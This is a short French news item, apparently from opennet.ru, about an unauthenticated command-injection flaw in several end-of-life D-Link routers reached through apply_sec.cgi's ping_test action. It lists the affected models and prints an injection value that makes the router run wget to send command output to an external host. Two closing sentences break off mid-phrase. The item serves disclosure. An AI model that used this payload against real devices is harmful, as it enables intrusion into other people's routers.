Dans les routeurs sans fil D-Link
Fait intéressant, selon les développeurs du firmware, l'appel « ping_test » ne devrait être exécuté qu'après authentification, mais en réalité, il est appelé dans tous les cas, quelle que soit la connexion à l'interface Web. En particulier, lors de l'accès au script apply_sec.cgi et du passage du paramètre « action=ping_test », le script redirige vers la page d'authentification, mais effectue en même temps l'action associée à ping_test. Pour exécuter le code, une autre vulnérabilité a été utilisée dans ping_test lui-même, qui appelle l'utilitaire ping sans vérifier correctement l'exactitude de l'adresse IP envoyée pour test. Par exemple, pour appeler l'utilitaire wget et transférer les résultats de la commande « echo 1234 » vers un hôte externe, il suffit de spécifier le paramètre « ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http:// test.test/?$( echo 1234)".
La présence de la vulnérabilité a été officiellement confirmée dans les modèles suivants :
- DIR-655 avec firmware 3.02b05 ou version antérieure ;
- DIR-866L avec firmware 1.03b04 ou version antérieure ;
- DIR-1565 avec firmware 1.01 ou version antérieure ;
- DIR-652 (aucune information sur les versions problématiques du micrologiciel n'est fournie)
La période de support pour ces modèles a déjà expiré, donc D-Link
Il a été découvert plus tard que la vulnérabilité était également
Source: opennet.ru